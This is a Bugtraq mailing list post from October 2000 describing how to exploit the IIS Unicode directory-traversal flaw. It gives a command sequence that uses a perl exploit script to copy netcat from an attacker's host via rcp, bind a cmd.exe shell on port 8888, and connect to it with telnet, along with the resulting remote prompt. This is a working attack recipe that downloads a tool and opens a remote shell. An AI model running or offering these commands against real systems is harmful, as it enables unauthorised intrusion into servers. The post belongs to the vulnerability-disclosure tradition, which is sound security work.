Bugtraq mailing list archives
IIS Unicode
From: Roelof Temmingh <roelof () SENSEPOST COM>
Date: Wed, 25 Oct 2000 02:54:58 +0200
Bugtraq ID 1806, http://www.securityfocus.com/vdb/bottom.html?vid=1806 applies: I was having problems executing a command that contains a redirect (>) using any of the IIS Unicode exploits (including my own exploits on security focus ;) ). If anyone can get a redirect working, please let me know. In order to get some interesting tools on the victim, you would probably want to have the victim to FTP to the attacker. Problem without redirect is that you cannot build the FTP command file, and you are a bit stuck. A workaround (example) (with a rsh running on attacker's host and the necessary config in .rhosts):
perl unicodexecute.pl 160.124.19.101:80 'rcp -b 160.124.19.98.roelof:/tmp/nc.exe nc.exe' perl unicodexecute.pl 160.124.19.101:80 'c:\inetpub\scripts\nc.exe -l -p 8888 -e cmd.exe' telnet 160.124.19.101 8888
Trying 160.124.19.101... Connected to clickfeed. Escape character is '^]'. Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\Inetpub\scripts> Of course you need to allow port 514 to the inside of your net etc. ;) Have fun, Roelof. PS: this is a bit of a rip off from www.hack.co.za - spawncmd.pl ------------------------------------------------------ Roelof W Temmingh SensePost IT security roelof () sensepost com +27 83 448 6996 http://www.sensepost.com
Current thread:
- IIS Unicode Roelof Temmingh (Oct 25)
- Re: IIS Unicode Ryan Yagatich (Oct 26)
- <Possible follow-ups>
- Re: IIS Unicode Nsfocus Security Team (Oct 26)